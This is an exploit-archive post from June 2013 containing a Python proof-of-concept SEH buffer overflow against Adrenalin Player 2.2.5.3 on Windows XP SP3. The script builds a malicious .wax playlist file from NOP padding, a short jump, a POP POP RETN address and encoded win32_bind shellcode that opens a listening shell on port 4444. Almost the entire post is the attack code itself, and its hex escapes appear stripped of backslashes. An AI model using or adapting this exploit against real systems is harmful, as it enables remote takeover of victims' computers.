Home / exploits Adrenalin Player 2.2.5.3 Buffer Overflow
Posted on 18 June 2013
# !/usr/bin/python # Title: Adrenalin Player (SEH) Buffer Overflow # software: Adrenalin Player # version : 2.2.5.3 # Platform: Windows XP sp3 # Date: June 16th, 2013 # Author: onying (@onyiing) # Blog : http://itsecuritynewbie.blogspot.com/ # Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com junk= "x90" * 2140 junk+="xebx06x90x90" #jmp short junk+="x13xf3x16x10" #POP POP RETN junk+="x90" * 16 # NOP padding before shellcode #win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa junk+=("xbbx25xaaxd2xa3x2bxc9xdaxd6xd9x74x24xf4x5exb1x51" "x31x5ex10x83xeexfcx03x7bxa6x30x56x7fxdcx5fxd4x97" "xd8x5fx18x98x7bx2bx8bx42x58xa0x11xb6x2bxcax9cxbe" "x2axdcx14x71x35xa9x74xadx44x46xc3x26x72x13xd5xd6" "x4axe3x4fx8ax29x23x1bxd5xf0x6exe9xd8x30x85x06xe1" "xe0x7excfx60xecxf4x50xaexefxe1x09x25xe3xbex5ex66" "xe0x41x8ax9bx34xc9xc5xf7x60xd1xb4xc4x58x32x52x41" "xd9xf4x10x15xd2x7fx56x89x47xf4xd7xb9xc9x63x56xf7" "xfbx9fx36xf8xd2x06xe4x60xb3xf5x38x04x34x89x0ex8b" "xeex92xbfx5bxc4x80xbcxa0x8axa5xebx89xa3xbfx72xb4" "x59x37x79xe3xcbx4ax82xdbx64x92x75x2exd9x73x79x06" "x71x2fxd6xf5x25x8cx8bxbax9axedxfcx5ax75x03xa1xc4" "xd6xaaxb8x9dxb1x08x20xedx86x06xaaxdbx63xb9x05xb6" "x8cx69xcdx9cxdexa4xe7x8bxdfx6fxa4x66xdfx40x23x6d" "x56xe7xfdx3ax96x31xadx90x3cxebxb1xc8x2ex7bxa9x91" "x96x05x62x9exc1xa3x73xb0x88x21xe8x56x3dxd5x9dx1f" "x58x73x0ex46x8ax48x27x9fxa6x14xb1xbdx06x55x32xeb" "x97x17x98x15x25xb4x71x64xd0xfcxdexddx8ex95x52xdf" "x62x73x6cx6axc1x83x44xcfx9ex29x38xbex71xa4xbbx11" "x23x6dxedx6ex13xe5xa0x49x91x38xe9x96x4cxaexf1x97" "x46xd0xdexecxfexd2x5cx36x64xd4xb5xe4x9axfax52x76" "xbdx19xd1xd5xc2x08xe9x09") junk+= "x90" * (3000-len(junk)) file = open("adrenalin.wax","w") file.write(junk) file.close()
